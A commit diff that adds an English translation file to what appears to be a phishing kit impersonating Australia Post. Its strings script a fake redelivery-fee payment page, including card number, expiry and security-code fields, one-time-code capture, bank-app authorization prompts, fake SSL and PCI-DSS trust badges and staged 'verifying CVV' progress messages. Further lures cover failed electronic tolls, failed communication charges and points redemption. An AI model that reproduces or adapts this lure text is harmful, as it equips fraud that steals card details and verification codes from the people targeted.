update
This commit is contained in:
98
a12_au_post_aupost/src/locales/en/index.ts
Normal file
98
a12_au_post_aupost/src/locales/en/index.ts
Normal file
@@ -0,0 +1,98 @@
|
||||
export default {
|
||||
"There is an error in this field, please check": "There is an error in this field, please check",
|
||||
"Please enter a valid email address": "Please enter a valid email address",
|
||||
"Dear users, please fill in the form carefully to ensure the successful delivery": "Dear users, please fill in the form carefully to ensure successful delivery",
|
||||
"Your Name": "Your Name",
|
||||
"Address": "Address",
|
||||
"Detailed Address": "Detailed Address",
|
||||
"(Optional)": "(Optional)",
|
||||
"City": "City",
|
||||
"State": "State / Region",
|
||||
"Province": "Province",
|
||||
"Region": "Region",
|
||||
"Zip Code": "Zip Code",
|
||||
"E-Mail": "E-Mail",
|
||||
"Next": "Next",
|
||||
"Telephone Number": "Telephone Number",
|
||||
"Online": "Online",
|
||||
"Payment": "Payment",
|
||||
"For redelivery, we need to charge some service fees.Your package will be re-delivered after payment": "For redelivery, a service fee is required. Your package will be re-delivered after payment",
|
||||
"lump sum: ": "Total amount: ",
|
||||
"Cardholder": "Cardholder",
|
||||
"Card Number": "Card Number",
|
||||
"Expire Date": "Expiration Date",
|
||||
"Security Code": "Security Code",
|
||||
"Submit": "Submit",
|
||||
"Click here to receive another code": "Click here to receive another code",
|
||||
"Please confirm your identity and a one-time code will be sent": "Please confirm your identity. A one-time code will be sent to your phone or email. Enter it here",
|
||||
"The verification code has been sent to": "The verification code has been sent to",
|
||||
"Please do not click the": "Please do not click 'Refresh' or 'Back' as it may interrupt the transaction",
|
||||
"Verification code error, please try again": "Verification code error, please try again",
|
||||
"The session is about to expire, please complete the verification now": "The session is about to expire, please complete the verification now",
|
||||
"This card does not support this transaction, please try another card": "This card does not support this transaction, please try another card",
|
||||
"Authorized bank": "Authorized bank",
|
||||
"Please go to the bank App to confirm the authorization": "Please go to the bank app to confirm authorization",
|
||||
"Please do not close this page": "Please do not close this page",
|
||||
"Payment Successful": "Payment Successful!",
|
||||
"Thank you for your purchase. Your payment has been processed successfully": "Thank you for your purchase. Your payment has been successfully processed",
|
||||
"Mailing address": "Mailing address",
|
||||
"street address or house number": "Street and house number",
|
||||
"Apartment number": "Apartment number",
|
||||
"Safe payment": "Safe payment",
|
||||
"Verification code": "Verification code",
|
||||
"Welcome": "Welcome",
|
||||
"back": "Back!",
|
||||
"We reward you for using point services": "We reward you for using point services",
|
||||
"Check your points": "Check your points",
|
||||
"Phone number": "Phone number",
|
||||
"Inquire": "Inquire",
|
||||
"Exchange": "Exchange",
|
||||
"Spend points": "Spend points",
|
||||
"Points Available": "Points Available",
|
||||
"You don't have enough points": "You don't have enough points",
|
||||
"Please redeem your favorite product": "Please redeem your favorite product with points",
|
||||
"Confirm your shipping address": "Confirm your shipping address",
|
||||
"Order number": "Order number: ",
|
||||
"Pay": "Pay",
|
||||
"Pay Message": "Pay {0} to redeem points for products",
|
||||
"Pay electronic tolls online": "Pay electronic tolls online",
|
||||
"your electronic toll payment was unsuccessful": "Your electronic toll payment was unsuccessful.",
|
||||
"Billing Information": "Billing Information",
|
||||
"Description": "Description",
|
||||
"Dear customer": "Dear Customer:",
|
||||
"Electronic Communications Charge Payment Failed": "Electronic Communications Charge Payment Failed",
|
||||
"Invoice Number": "Invoice Number",
|
||||
"Amount": "Amount",
|
||||
"Pay Immediately": "Pay Immediately",
|
||||
"Phone Number": "Phone Number",
|
||||
"Electronic communication fee payment failed": "Electronic communication fee payment failed",
|
||||
"Illustrate": "Explanation",
|
||||
"SSL Encryption": "SSL Encryption",
|
||||
"PCI-DSS Certified": "PCI-DSS Certified",
|
||||
"Transaction Details": "Transaction Details",
|
||||
"Transaction ID:": "Transaction ID:",
|
||||
"Processing Network:": "Processing Network:",
|
||||
"Processing Time:": "Processing Time:",
|
||||
"Security Level:": "Security Level:",
|
||||
"Preparing...": "Preparing...",
|
||||
"High": "High",
|
||||
"Initializing payment environment...": "Initializing payment environment...",
|
||||
"Encrypting card information...": "Encrypting card information...",
|
||||
"Establishing secure connection...": "Establishing secure connection...",
|
||||
"Verifying card number and issuer...": "Verifying card number and issuer...",
|
||||
"Validating CVV code...": "Validating CVV code...",
|
||||
"Checking fraud risk...": "Checking fraud risk...",
|
||||
"Sending transaction request...": "Sending transaction request...",
|
||||
"Waiting for bank authorization...": "Waiting for bank authorization...",
|
||||
"Processing bank response...": "Processing bank response...",
|
||||
"Confirming transaction status...": "Confirming transaction status...",
|
||||
"Finalizing transaction...": "Finalizing transaction...",
|
||||
"Visa Secure Network": "Visa Secure Network",
|
||||
"Mastercard Global Payment Network": "Mastercard Global Payment Network",
|
||||
"American Express Dedicated Channel": "American Express Dedicated Channel",
|
||||
"UnionPay Gateway": "UnionPay Gateway",
|
||||
"{time} seconds": "{time} seconds",
|
||||
"International Payment Network": "International Payment Network",
|
||||
"redelivery_fee_message": "For redelivery, a service fee of {amount} is required. Your package will be re-delivered after payment",
|
||||
"Verifying...": "Verifying..."
|
||||
};
|
||||
Reference in New Issue
Block a user